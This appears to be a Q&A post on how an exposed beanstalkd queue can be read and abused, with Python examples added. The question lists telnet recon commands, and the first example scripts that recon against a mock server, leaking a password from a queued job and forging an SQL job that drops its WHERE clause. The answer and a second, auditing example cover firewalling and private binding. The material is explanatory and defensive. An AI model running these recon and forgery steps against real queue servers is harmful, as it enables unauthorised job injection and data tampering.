Beanstalkd / Pheanstalk security issue


Question

I have just started using beanstalkd and pheanstalk and I am curious whether the following situation is a security issue (and if not, why not?):

When designing a queue that will contain jobs for an eventual worker script to pick up and perform SQL database queries, I asked a friend what I could do to prevent an online user from going into port 11300 of my server, inserting a job into the queue himself and hence causing the job to be executed with malicious code. I was told that I could include a password inside the job being sent.

Though after some time passed, I recognized that someone could perform a few simple commands on a terminal and obtain the job inside the queue, and hence find the password, and then create jobs with the password included:

telnet thewebsitesipaddress 11300 //creating a telnet connection
list-tubes //finding which tubes are currently being used
use a_tube_found //using one of the tubes found
peek-ready //see whats inside one of the jobs and find the password

What could be done to make sure this does not happen and my queue doesn't get hacked / controlled?

Thanks in advance!
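The recon from the question carried out in code rather than by hand, as an added example that is not part of the original question or answer. It talks to a small fake server constructed here that only mimics beanstalkd's wire format (the OK / USING / FOUND / INSERTED replies); the tube name sql_jobs, the job body and the password in it are all constructed for the demo. What it shows: beanstalkd's protocol has no authentication, so whoever can reach the port can read the password out of a waiting job and then put a job of their own carrying the same password.

```python
"""Added example (not from the question or the answer): a minimal client for the
beanstalkd text protocol run against a constructed in-process fake server. The
fake server is NOT beanstalkd; it only mimics the wire format of the real replies."""
import socket
import threading

# Constructed sample job: the worker would check the password, then run the SQL.
SAMPLE_JOB = b'{"password":"s3cret","sql":"UPDATE users SET role=1 WHERE id=7"}'
TUBES = ["default", "sql_jobs"]


def _fake_beanstalkd(conn):
    """Serve one connection, answering a few commands the way beanstalkd does."""
    jobs = {"sql_jobs": [(1, SAMPLE_JOB)]}       # tube -> [(id, body)]; job 1 is ready
    tube, next_id, buf = "default", 2, b""
    while True:
        data = conn.recv(4096)
        if not data:                              # client closed: we are done
            break
        buf += data
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            parts = line.decode().split()
            if parts[0] == "list-tubes":          # OK <bytes>\r\n<yaml list>\r\n
                body = ("---\n" + "".join(f"- {t}\n" for t in TUBES)).encode()
                conn.sendall(b"OK %d\r\n%s\r\n" % (len(body), body))
            elif parts[0] == "use":               # USING <tube>\r\n
                tube = parts[1]
                conn.sendall(b"USING %s\r\n" % tube.encode())
            elif parts[0] == "peek-ready":        # FOUND <id> <bytes>\r\n<body>\r\n
                if jobs.get(tube):
                    jid, body = jobs[tube][0]
                    conn.sendall(b"FOUND %d %d\r\n%s\r\n" % (jid, len(body), body))
                else:
                    conn.sendall(b"NOT_FOUND\r\n")
            elif parts[0] == "put":               # put <pri> <delay> <ttr> <bytes>\r\n<body>\r\n
                nbytes = int(parts[4])
                while len(buf) < nbytes + 2:      # wait for the whole body plus \r\n
                    buf += conn.recv(4096)
                body, buf = buf[:nbytes], buf[nbytes + 2:]
                jobs.setdefault(tube, []).append((next_id, body))
                conn.sendall(b"INSERTED %d\r\n" % next_id)
                next_id += 1
    conn.close()


class Client:
    """Just enough of the protocol for the recon and the forged put."""
    def __init__(self, sock):
        self.sock, self.buf = sock, b""

    def _readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, self.buf = self.buf.split(b"\r\n", 1)
        return line.decode().split()

    def _readbody(self, nbytes):
        while len(self.buf) < nbytes + 2:         # body is terminated by \r\n
            self.buf += self.sock.recv(4096)
        body, self.buf = self.buf[:nbytes], self.buf[nbytes + 2:]
        return body

    def list_tubes(self):
        self.sock.sendall(b"list-tubes\r\n")
        _, nbytes = self._readline()              # "OK <bytes>"
        yaml = self._readbody(int(nbytes)).decode()
        return [ln[2:] for ln in yaml.splitlines() if ln.startswith("- ")]

    def use(self, tube):
        self.sock.sendall(f"use {tube}\r\n".encode())
        return self._readline()[1]                # "USING <tube>"

    def peek_ready(self):
        self.sock.sendall(b"peek-ready\r\n")
        parts = self._readline()
        return self._readbody(int(parts[2])) if parts[0] == "FOUND" else None

    def put(self, body, pri=1024, delay=0, ttr=60):
        self.sock.sendall(b"put %d %d %d %d\r\n%s\r\n" % (pri, delay, ttr, len(body), body))
        parts = self._readline()                  # "INSERTED <id>"
        return int(parts[1]) if parts[0] == "INSERTED" else None


def run_attack():
    """Recon, then put a forged job that reuses the leaked password."""
    srv, cli = socket.socketpair()
    threading.Thread(target=_fake_beanstalkd, args=(srv,), daemon=True).start()
    c = Client(cli)
    tubes = c.list_tubes()                        # 1. which tubes exist
    c.use("sql_jobs")                             # 2. pick the interesting one
    leaked = c.peek_ready()                       # 3. read a waiting job, password included
    forged = leaked.replace(b" WHERE id=7", b"")  # 4. same password, attacker's SQL
    forged_id = c.put(forged)                     #    the worker will run this one too
    cli.close()
    return {"tubes": tubes, "leaked": leaked, "forged_id": forged_id}
```

Calling run_attack() returns the tube list, the leaked job body and the id the forged job was stored under. Against a real beanstalkd the same Client works over a plain TCP socket to port 11300, which is exactly why the password-in-the-job idea does not help: the secret is readable by the same peer it was meant to keep out.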

Answer

You can avoid those situations by placing beanstalkd behind a firewall or in a private network.

DigitalOcean (for example) offers such a service, where you have a private network IP address which can be accessed only from servers in the same location.

We've been using beanstalkd in our company for more than a year, and we haven't had any of those issues yet.

I see, but what if the producer was a page called index.php, where when someone entered it, a job would be sent to the queue? In this situation, wouldn't the server have to be on an open network?

The browser has no way to get in contact with the job server; it only accesses the resources /you/ allow it to, that is, the view page. Only the back-end is allowed to access the job server. Also, if you build the web application in such a way that the front-end is separated from the back-end, you're going to have even fewer potential security issues.
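A check for the fix recommended above, added here as an example (it is not part of the answer, nor code from beanstalkd or Pheanstalk). The beanstalkd flags it reads are real (-l sets the listen address and defaults to 0.0.0.0, -p sets the port and defaults to 11300); the command lines, the allow-list ranges and every address below are constructed for the demo, including 11.0.0.1 as a stand-in for an arbitrary routable address. It answers the two questions a reviewer asks of such a deployment: what interface does the daemon bind, and does the firewall still let the internet reach it.

```python
"""Added example (not from the original answer): audit helpers for keeping
beanstalkd off any network the public can reach. The -l / -p flags are
beanstalkd's real options; command lines and addresses are constructed."""
import ipaddress
import socket


def classify_listen_address(addr):
    """Classify a beanstalkd -l value: 'wildcard', 'loopback', 'private' or 'public'."""
    ip = ipaddress.ip_address(addr)
    if ip.is_unspecified:        # 0.0.0.0 or ::, i.e. every interface on the box
        return "wildcard"
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:            # RFC 1918 / ULA, e.g. a provider's private-network IP
        return "private"
    return "public"


def listen_address_from_cmdline(cmdline):
    """Extract the -l value from a beanstalkd command line (0.0.0.0 if absent).

    Only the separated form `-l ADDR` is handled; assumed here to be the form
    used in practice, a `-lADDR` form is not recognised.
    """
    args = cmdline.split()
    for i, a in enumerate(args[:-1]):
        if a == "-l":
            return args[i + 1]
    return "0.0.0.0"


def source_allowed(src, allow_cidrs):
    """Firewall-style check: is a connecting source address inside any allowed range?"""
    ip = ipaddress.ip_address(src)
    return any(ip in ipaddress.ip_network(c, strict=False) for c in allow_cidrs)


def port_reachable(host, port, timeout=0.5):
    """Probe whether a TCP port accepts connections from here (what a pentester runs)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe_demo():
    """Show port_reachable on a throwaway listener: (True while open, False after close)."""
    lst = socket.socket()
    lst.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
    lst.listen(1)
    port = lst.getsockname()[1]
    while_open = port_reachable("127.0.0.1", port)
    lst.close()
    return while_open, port_reachable("127.0.0.1", port)


def audit(cmdline, allow_cidrs, attacker_ip="203.0.113.9"):
    """Return the findings a reviewer would raise for a beanstalkd deployment.

    attacker_ip is a documentation-range address standing in for 'the internet';
    allow_cidrs is the firewall's allow-list for port 11300 (constructed input).
    """
    listen = listen_address_from_cmdline(cmdline)
    kind = classify_listen_address(listen)
    findings = []
    if kind in ("wildcard", "public"):
        findings.append(f"beanstalkd listens on {listen} ({kind}): anyone who can route "
                        "to the host can list tubes, peek jobs and put jobs")
    if source_allowed(attacker_ip, allow_cidrs):
        findings.append(f"firewall allow-list admits {attacker_ip}: port 11300 is open "
                        "to the internet, so binding alone is not enough")
    return findings
```

The deployment the answer describes passes both checks: start the daemon with `-l <private-network IP>` (or 127.0.0.1 when the worker runs on the same host) and allow port 11300 only from the back-end's own private range, so `audit("beanstalkd -l 10.132.0.5 -p 11300", ["10.0.0.0/8"])` returns no findings, while the default `beanstalkd -p 11300` behind an allow-everything rule returns two.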
